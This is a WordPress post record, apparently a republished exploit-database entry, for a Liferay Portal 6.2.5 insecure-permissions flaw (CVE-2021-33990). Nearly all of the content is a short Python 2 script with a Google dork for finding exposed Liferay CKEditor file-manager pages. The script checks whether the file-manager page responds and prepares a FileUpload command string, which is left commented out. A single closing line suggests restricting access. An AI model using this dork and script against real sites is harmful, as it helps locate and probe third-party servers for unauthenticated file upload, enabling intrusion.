{"id":39986,"date":"2023-04-05T22:00:45","date_gmt":"2023-04-05T18:00:45","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/171701\/liferayportal625-insecure.txt"},"modified":"2023-04-10T12:48:28","modified_gmt":"2023-04-10T08:18:28","slug":"liferay-portal-6-2-5-insecure-permissions","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/liferay-portal-6-2-5-insecure-permissions\/","title":{"rendered":"Liferay Portal 6.2.5 Insecure Permissions"},"content":{"rendered":"<p># Exploit Title: Liferay Portal 6.2.5 &#8211; Insecure Permissions<br \/>\n# Google Dork: -inurl:\/html\/js\/editor\/ckeditor\/editor\/filemanager\/browser\/<br \/>\n# Date: 2021\/05<br \/>\n# Exploit Author: fu2x2000<br \/>\n# Version: Liferay Portal 6.2.5 or later<br \/>\n# CVE : CVE-2021-33990<\/p>\n<p>import requests<br \/>\nimport json<\/p>\n<p>print (&#8221; Search this on Google #Dork for liferay<br \/>\n-inurl:\/html\/js\/editor\/ckeditor\/editor\/filemanager\/browser\/&#8221;)<\/p>\n<p>url =&#8221;URL Goes Here<br \/>\n\/html\/js\/editor\/ckeditor\/editor\/filemanager\/browser\/liferay\/frmfolders.html&#8221;<br \/>\nreq = requests.get(url)<br \/>\nprint req<br \/>\nsta = req.status_code<br \/>\nif sta == 200:<br \/>\nprint (&#8216;Life Vulnerability exists&#8217;)<br \/>\ncook = url<br \/>\nprint cook<br \/>\ninject = &#8220;Command=FileUpload&amp;Type=File&amp;CurrentFolder=\/&#8221;<br \/>\n#cook_inject = cook+inject<br \/>\n#print cook_inject<br \/>\nelse:<br \/>\nprint (&#8216;not found try a another method&#8217;)<\/p>\n<p>print (&#8220;solution restrict access and user groups&#8221;)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Liferay Portal 6.2.5 &#8211; Insecure Permissions # Google Dork: -inurl:\/html\/js\/editor\/ckeditor\/editor\/filemanager\/browser\/ # Date: 2021\/05 # Exploit Author: fu2x2000 # Version: Liferay Portal 6.2.5 or later # CVE : CVE-2021-33990 import requests import json print (&#8221; Search this on Google #Dork for liferay -inurl:\/html\/js\/editor\/ckeditor\/editor\/filemanager\/browser\/&#8221;) url =&#8221;URL Goes Here \/html\/js\/editor\/ckeditor\/editor\/filemanager\/browser\/liferay\/frmfolders.html&#8221; req = requests.get(url) print req &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-39986","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39986","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=39986"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39986\/revisions"}],"predecessor-version":[{"id":40119,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39986\/revisions\/40119"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=39986"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=39986"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=39986"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}